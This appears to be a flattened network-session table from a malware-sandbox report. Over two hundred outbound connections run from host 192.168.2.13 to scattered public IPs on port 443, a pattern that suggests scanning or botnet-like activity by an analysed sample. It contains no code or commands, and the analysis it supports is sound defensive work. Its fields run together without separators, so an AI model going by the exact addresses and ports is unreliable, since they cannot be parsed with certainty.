                                    20107192.168.2.1360546124.20.65.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20108192.168.2.1334504181.115.127.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20109192.168.2.1359480206.235.31.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20110192.168.2.1356570163.56.162.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20111192.168.2.134738640.220.227.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20112192.168.2.1346258122.114.203.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20113192.168.2.1360318173.58.61.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20114192.168.2.134367618.216.26.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20115192.168.2.134587061.18.133.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20116192.168.2.1338392140.38.117.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20117192.168.2.1334324116.121.141.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20118192.168.2.13596208.18.91.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20119192.168.2.134334875.132.225.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20120192.168.2.133898648.165.180.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20121192.168.2.1355502159.242.90.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20122192.168.2.1354142174.200.28.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20123192.168.2.1349176147.119.96.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20124192.168.2.135495697.240.42.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20125192.168.2.1357174188.164.68.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20126192.168.2.1350122139.143.152.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20127192.168.2.13480102.107.212.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20128192.168.2.1343924210.208.68.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20129192.168.2.1353482113.233.111.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20130192.168.2.1348806157.24.238.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20131192.168.2.1354968179.204.173.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20132192.168.2.135043877.220.250.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20133192.168.2.135652612.184.224.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20134192.168.2.1351720202.49.90.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20135192.168.2.135021497.231.19.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20136192.168.2.13593642.19.106.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20137192.168.2.1354196192.247.78.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20138192.168.2.1337228196.33.156.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20139192.168.2.1350876222.10.137.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20140192.168.2.1343454115.181.97.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20141192.168.2.1338224184.30.96.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20142192.168.2.135609425.20.189.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20143192.168.2.136084841.108.154.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20144192.168.2.1351628135.184.83.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20145192.168.2.133814482.123.194.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20146192.168.2.1349814192.193.248.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20147192.168.2.1347362175.110.140.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20148192.168.2.1350366112.22.170.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20149192.168.2.134381266.70.45.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20150192.168.2.133725835.59.251.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20151192.168.2.1339398169.110.224.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20152192.168.2.1359498208.219.44.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20153192.168.2.134524490.88.106.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20154192.168.2.1343328184.211.121.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20155192.168.2.1354838158.153.54.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20156192.168.2.134859862.226.43.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20157192.168.2.1335808135.6.157.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20158192.168.2.134273881.251.68.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20159192.168.2.1351664196.229.180.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20160192.168.2.1342192145.238.233.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20161192.168.2.134537441.245.145.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20162192.168.2.1359482193.44.27.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20163192.168.2.134050882.176.168.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20164192.168.2.134418288.121.46.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20165192.168.2.1346692221.174.217.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20166192.168.2.135532464.15.192.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20167192.168.2.136009484.63.85.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20168192.168.2.1340104171.24.175.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20169192.168.2.1345146202.215.118.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20170192.168.2.135143612.81.144.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20171192.168.2.134736868.103.9.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20172192.168.2.133798452.43.55.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20173192.168.2.135551263.44.80.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20174192.168.2.133510267.134.194.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20175192.168.2.1340918157.116.65.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20176192.168.2.1360058132.149.35.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20177192.168.2.134031619.87.138.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20178192.168.2.1350816219.109.226.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20179192.168.2.1341970119.190.216.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20180192.168.2.134420443.233.12.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20181192.168.2.1341238138.10.171.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20182192.168.2.1349690171.226.78.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20183192.168.2.134548231.224.44.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20184192.168.2.1348378108.18.73.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20185192.168.2.1354496183.65.227.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20186192.168.2.134193864.140.121.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20187192.168.2.1347614146.32.150.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20188192.168.2.134800457.140.90.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20189192.168.2.1340274107.143.158.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20190192.168.2.1352732114.8.252.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20191192.168.2.133650041.166.38.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20192192.168.2.134208012.170.209.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20193192.168.2.1356618148.88.51.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20194192.168.2.1333840149.200.44.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20195192.168.2.134050080.81.27.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20196192.168.2.1356666105.195.79.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20197192.168.2.134094447.87.247.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20198192.168.2.134600267.210.37.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20199192.168.2.1344142160.232.191.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20200192.168.2.13366969.216.132.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20201192.168.2.134910278.124.152.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20202192.168.2.1346538168.141.101.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20203192.168.2.135268038.195.148.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20204192.168.2.1357990150.8.238.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20205192.168.2.13461229.236.37.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20206192.168.2.1333168121.77.193.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20207192.168.2.135569617.163.39.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20208192.168.2.134068857.68.168.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20209192.168.2.135796236.151.154.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20210192.168.2.1347562169.219.176.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20211192.168.2.133493069.128.50.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20212192.168.2.134412697.231.42.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20213192.168.2.13545728.228.120.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20214192.168.2.1351352157.128.197.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20215192.168.2.133644218.207.240.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20216192.168.2.136003241.165.82.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20217192.168.2.1350206118.174.48.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20218192.168.2.134190489.140.58.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20219192.168.2.1354364105.97.160.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20220192.168.2.1353016109.122.139.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20221192.168.2.1339150146.116.114.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20222192.168.2.136025257.2.22.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20223192.168.2.135180248.141.229.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20224192.168.2.134910864.48.90.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20225192.168.2.1348556161.111.102.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20226192.168.2.1342350183.54.184.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20227192.168.2.1339046171.1.239.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20228192.168.2.134157688.236.119.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20229192.168.2.1334094211.98.195.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20230192.168.2.1338000126.243.61.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20231192.168.2.1352642201.91.60.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20232192.168.2.1339910131.210.110.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20233192.168.2.133483012.93.48.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20234192.168.2.1360744168.111.175.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20235192.168.2.134776088.191.106.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20236192.168.2.133702495.32.181.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20237192.168.2.133447413.17.147.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20238192.168.2.1350374102.44.164.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20239192.168.2.1334616171.143.47.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20240192.168.2.1356862161.7.168.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20241192.168.2.1338014192.64.108.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20242192.168.2.134560891.133.249.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20243192.168.2.1360140218.78.77.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20244192.168.2.134975493.11.126.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20245192.168.2.1353340121.59.151.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20246192.168.2.134412680.168.227.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20247192.168.2.134995092.223.12.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20248192.168.2.1333014133.189.85.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20249192.168.2.1341132197.52.20.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20250192.168.2.135143487.139.15.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20251192.168.2.1338386217.110.33.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20252192.168.2.1360638161.235.70.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20253192.168.2.135357427.197.25.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20254192.168.2.1340136204.149.57.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20255192.168.2.1341082129.60.14.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20256192.168.2.133432884.156.113.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20257192.168.2.133577890.38.154.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20258192.168.2.1359982132.247.122.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20259192.168.2.1333462199.59.253.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20260192.168.2.134817262.132.228.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20261192.168.2.1349432174.228.248.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20262192.168.2.1351236220.50.95.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20263192.168.2.135114679.124.98.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20264192.168.2.1348570116.227.84.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20265192.168.2.1342760116.237.135.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20266192.168.2.134276242.223.245.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20267192.168.2.13570824.187.213.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20268192.168.2.1360074167.169.27.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20269192.168.2.135205417.29.101.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20270192.168.2.1340438208.74.17.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20271192.168.2.135364240.255.56.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20272192.168.2.1342494162.110.17.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20273192.168.2.133388691.241.221.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20274192.168.2.1351318196.165.117.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20275192.168.2.1336266128.206.233.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20276192.168.2.1344026171.24.176.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20277192.168.2.134193439.115.21.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20278192.168.2.134248032.236.196.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20279192.168.2.1338364115.126.3.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20280192.168.2.1360452109.64.101.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20281192.168.2.134864012.109.36.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20282192.168.2.133471643.174.154.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20283192.168.2.1340098130.76.73.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20284192.168.2.1348958136.203.114.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20285192.168.2.1343868202.215.192.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20286192.168.2.133652449.165.62.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20287192.168.2.1339506110.67.47.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20288192.168.2.1360538210.224.204.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20289192.168.2.1360796131.43.56.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20290192.168.2.1353160161.33.234.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20291192.168.2.1338040156.220.252.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20292192.168.2.1353572115.149.210.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20293192.168.2.1356772112.67.145.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20294192.168.2.1340580195.44.35.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20295192.168.2.1345932125.71.252.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20296192.168.2.1344592142.220.114.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20297192.168.2.135395457.88.203.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20298192.168.2.135537232.222.85.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20299192.168.2.135201663.149.55.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20300192.168.2.135613463.62.86.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20301192.168.2.134120488.80.128.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20302192.168.2.135829658.187.86.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20303192.168.2.136011238.62.24.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20304192.168.2.1360596147.215.231.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20305192.168.2.134648497.158.68.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20306192.168.2.1342410117.201.0.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20307192.168.2.1358204102.127.39.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20308192.168.2.133947464.64.18.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20309192.168.2.1347550174.64.75.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20310192.168.2.13483881.34.115.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20311192.168.2.1340190169.211.34.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20312192.168.2.1349480202.177.120.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20313192.168.2.1359882156.136.38.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20314192.168.2.1355294167.70.128.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20315192.168.2.1353806152.86.196.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20316192.168.2.133437014.176.175.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20317192.168.2.1345432168.41.230.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20318192.168.2.1334108171.122.202.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20319192.168.2.1356194139.167.191.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20320192.168.2.1346142110.164.163.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20321192.168.2.136017457.199.100.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20322192.168.2.134650066.129.253.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20323192.168.2.1352012134.97.228.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20324192.168.2.1346966183.152.47.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20325192.168.2.1357096206.35.89.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20326192.168.2.135171020.109.223.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20327192.168.2.1356626178.28.239.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20328192.168.2.1337510121.19.138.61443
                                    TimestampBytes transferredDirectionData


